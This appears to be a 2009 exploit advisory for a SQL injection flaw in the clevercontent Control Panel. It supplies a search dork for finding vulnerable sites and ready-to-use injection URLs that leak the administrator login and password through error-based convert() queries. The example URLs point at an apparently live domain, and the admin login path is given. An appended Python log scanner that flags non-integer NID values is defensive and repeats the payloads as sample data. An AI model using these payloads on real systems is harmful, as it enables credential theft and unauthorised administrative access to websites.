clevercontent Control Panel SQL injection vulnerability

2009.12.07
Credit: AnGeL25dZ
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

************************************************************
** clevercontent Control Panel SQL injection vulnerability
************************************************************
** Product       : clevercontent Control Panel
** Home          : http://clevercontent.ch
** Vulnerability : SQL injection
** Dork          : inurl:"s_page1.asp?NID="
**
************************************************************
** Discovered by : AnGeL25dZ
** Contact       : angel25dz@gmail.com
**                 g4r@hotmail.com
**
************************************************************
** Greetz to : ALLAH
**             All Members of http://Hackteach.org/cc/
**             All my friends, Ra3ch & Cold-z3ro & K
**
************************************************************
************************ Exploit ***************************
************************************************************
**
** Login :
**
** http://[URL]/site/s_page1.asp?NID=1%2b convert(int, (select top 1 BEN_LOGIN FROM vw_sys_login))
**
** Pass :
**
** http://[URL]/site/s_page1.asp?NID=1%2b convert(int, (select top 1 BEN_PW FROM vw_sys_login))
**
** Admin control panel login : http://[URL]/admin/interface/00_login/index.asp
**
** Note: see the URL format in the example
************************************************************
************************ Example ***************************
**
** http://www.clevercontent.ch/w_cm/site/s_page1.asp?NID=190%2b convert(int, (select top 1 BEN_LOGIN FROM vw_sys_login))
**
** http://www.clevercontent.ch/w_cm/site/s_page1.asp?NID=190%2b convert(int, (select top 1 BEN_PW FROM vw_sys_login))
**
************************************************************
********************** See U ;-) ***************************
************************************************************
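A defender-side check for the request pattern shown above, added here as an example and not part of the original advisory: it scans web-server access logs for requests to s_page1.asp whose NID parameter is not a plain integer. The log field order, the sample lines and the function names are constructed for illustration, and treating NID as a short numeric ID is an assumption drawn from the example URLs.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log (not from the advisory). Assumed field order:
# date time method uri-stem uri-query client-ip status
SAMPLE_LOG = """\
2009-12-07 10:01:02 GET /site/s_page1.asp NID=190 192.0.2.10 200
2009-12-07 10:01:09 GET /site/s_page1.asp NID=1%2b+convert(int,+(select+top+1+BEN_LOGIN+FROM+vw_sys_login)) 192.0.2.66 500
2009-12-07 10:01:15 GET /site/s_page1.asp NID=1%2Bconvert%28int%2C%28select%20top%201%20BEN_PW%20FROM%20vw_sys_login%29%29 192.0.2.66 500
2009-12-07 10:02:00 GET /site/s_page2.asp NID=abc 192.0.2.11 200
2009-12-07 10:02:30 GET /site/S_Page1.asp lang=de&NID=12 192.0.2.12 200
"""

TARGET = "/s_page1.asp"
SQL_HINTS = re.compile(r"\b(select|convert|cast|union|from|exec)\b", re.I)


def is_valid_nid(value):
    """Allow-list check. Assumption: NID is a short, purely numeric ID."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None


def scan(log_text):
    """Return one finding per NID value on the target page that is not an integer."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7:
            continue  # skip comment and malformed lines
        date, time, _method, stem, query, ip, status = fields
        if not stem.lower().endswith(TARGET):
            continue
        # parse_qsl URL-decodes names and values (%2b -> "+", "+" -> space)
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "nid" and not is_valid_nid(value):
                findings.append({
                    "when": f"{date} {time}",
                    "ip": ip,
                    "status": int(status),
                    "nid": value,
                    "sql_like": bool(SQL_HINTS.search(value)),
                })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list test is the check a page should apply before NID reaches a SQL statement, alongside parameterized queries.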

